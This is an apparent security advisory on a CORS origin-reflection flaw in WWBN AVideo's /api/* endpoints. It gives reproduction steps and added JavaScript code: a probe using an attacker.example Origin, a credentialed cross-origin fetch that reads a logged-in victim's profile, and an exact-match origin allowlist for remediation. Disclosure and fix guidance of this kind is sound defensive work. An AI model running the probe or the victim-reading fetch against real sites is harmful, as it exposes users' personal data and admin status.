WWBN AVideo Cross-Origin Resource Sharing Vulnerability Allowing Data Theft

Vulnerability

A Cross-Origin Resource Sharing (CORS) vulnerability has been identified in WWBN AVideo versions 29.0 and below. An earlier fix for CORS origin validation was incomplete: for every '/api/*' endpoint the server still echoes an arbitrary request 'Origin' header back in 'Access-Control-Allow-Origin' while also sending 'Access-Control-Allow-Credentials: true'. That combination lets a page on any origin make credentialed cross-origin requests and read the authenticated responses, which contain personal user information such as email address, admin status, and other session-sensitive data.

Impact

A page on an attacker-controlled origin can issue requests to the API that the browser sends with the victim's session cookies; because the origin is reflected and credentials are allowed, the attacker's script can read the responses, bypassing the cross-origin isolation CORS is meant to enforce. The exposed data includes personal information and the account's admin status.

Reproduction

To reproduce, host a page on a domain you control whose script sends a cross-origin request to the target AVideo site's API user endpoint with credentials included (for example, fetch() with credentials set to 'include'). When a logged-in user visits that page, the browser attaches the user's session cookies; because the server echoes the page's origin and allows credentials, the script can read the response containing the user's information. The browser only attaches the session cookie to a cross-site request if the cookie permits it (SameSite=None, or a browser that does not default to Lax), so check the cookie's attributes if a test returns an unauthenticated response.
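The following is an added example, not code from the advisory or from the AVideo project. It covers both the mechanism described under Vulnerability and the reproduction steps above: a Node probe that sends a nonce 'Origin' to an endpoint and classifies the response headers, plus the credentialed cross-origin fetch an attacker's page would run in the victim's browser. The hostnames and the endpoint path are assumptions.

```javascript
// Added example (not AVideo project code): probe an /api/* endpoint for
// credentialed Origin reflection, and the browser-side request an attacker's
// page would issue. Hostnames and the endpoint path below are assumptions.

const TARGET_API = "https://avideo.example/api/user"; // assumed path; replace with the real user endpoint

// A nonce subdomain so a match can only come from reflection, never from a
// legitimately allowlisted origin.
function randomProbeOrigin(base = "attacker.example") {
  const nonce = Math.random().toString(36).slice(2, 10);
  return `https://${nonce}.${base}`;
}

// Classify CORS response headers for a given request Origin.
// Only "reflected-with-credentials" lets a cross-origin page read an
// authenticated response: browsers reject "*" combined with credentials.
function classifyCors(requestOrigin, responseHeaders) {
  const h = {};
  for (const [k, v] of Object.entries(responseHeaders)) h[k.toLowerCase()] = String(v).trim();
  const acao = h["access-control-allow-origin"];
  const credentialed = (h["access-control-allow-credentials"] || "").toLowerCase() === "true";
  if (!acao) return "no-cors";
  if (acao === "*") return credentialed ? "wildcard-with-credentials" : "wildcard";
  if (acao === requestOrigin) return credentialed ? "reflected-with-credentials" : "reflected";
  return "fixed-origin";
}

// Live probe (Node 18+, global fetch). Node's fetch lets a script set Origin,
// which a browser would not. Needs network access; not exercised offline.
async function probe(url = TARGET_API, origin = randomProbeOrigin()) {
  const res = await fetch(url, { headers: { Origin: origin }, redirect: "manual" });
  const headers = Object.fromEntries(res.headers.entries());
  return { origin, status: res.status, verdict: classifyCors(origin, headers) };
}

// What the attacker's page runs in the victim's browser: a credentialed
// cross-origin GET. The browser attaches the victim's cookies; with the Origin
// echoed and credentials allowed, the script may read the JSON body.
async function readVictimProfile(apiUrl = TARGET_API) {
  const res = await fetch(apiUrl, { credentials: "include" });
  return res.json();
}
```

Run probe() from a Node shell against a test instance you own; a verdict of "reflected-with-credentials" for a random subdomain is the exploitable condition, while "fixed-origin" or "no-cors" indicates the origin is no longer echoed.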

Remediation

Update to the patched version of AVideo, which includes the CORS origin-validation fix; update instructions are in the AVideo documentation. After updating, verify the fix by sending a request to any '/api/*' endpoint with an arbitrary 'Origin' header and confirming that the value is no longer echoed in 'Access-Control-Allow-Origin' together with 'Access-Control-Allow-Credentials: true'.
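As an added illustration of what a complete origin check looks like (this is not AVideo's patch, and the allowed hostnames are assumptions), the following contrasts an exact-match allowlist with the kind of substring test that an incomplete fix tends to leave behind:

```javascript
// Added example (not AVideo's patch): an exact-match origin allowlist beside
// the kind of substring check that an incomplete fix tends to leave behind.
// The allowed hostnames are assumptions.

const ALLOWED_ORIGINS = new Set([
  "https://avideo.example",
  "https://www.avideo.example",
]);

// Weak: a substring test accepts "https://avideo.example.attacker.example"
// and "https://attacker.example/?u=https://avideo.example". Shown only as the
// pattern to avoid; it is not taken from AVideo.
function weakOriginAllowed(origin) {
  return [...ALLOWED_ORIGINS].some((allowed) => origin.includes(allowed));
}

// Strict: parse the header into a serialized origin and compare it whole.
// Unparseable values (including the literal "null") are rejected.
function strictOriginAllowed(origin) {
  if (typeof origin !== "string") return false;
  let parsed;
  try {
    parsed = new URL(origin);
  } catch {
    return false;
  }
  // A real Origin header carries no path, query or fragment; anything else is suspect.
  if (parsed.pathname !== "/" || parsed.search || parsed.hash) return false;
  return ALLOWED_ORIGINS.has(parsed.origin);
}

// Headers to emit for a request. Deny by omission: no ACAO at all, never a
// reflected one. Vary: Origin keeps caches from serving one origin's answer
// to another.
function corsHeadersFor(origin) {
  if (!strictOriginAllowed(origin)) return {};
  return {
    "Access-Control-Allow-Origin": new URL(origin).origin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",
  };
}
```

The strict variant also rejects scheme mismatches ("http://avideo.example" against an https allowlist), which a hostname-only comparison would let through.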

Added: Apr 22, 2026, 12:03 AM
Updated: Apr 22, 2026, 12:03 AM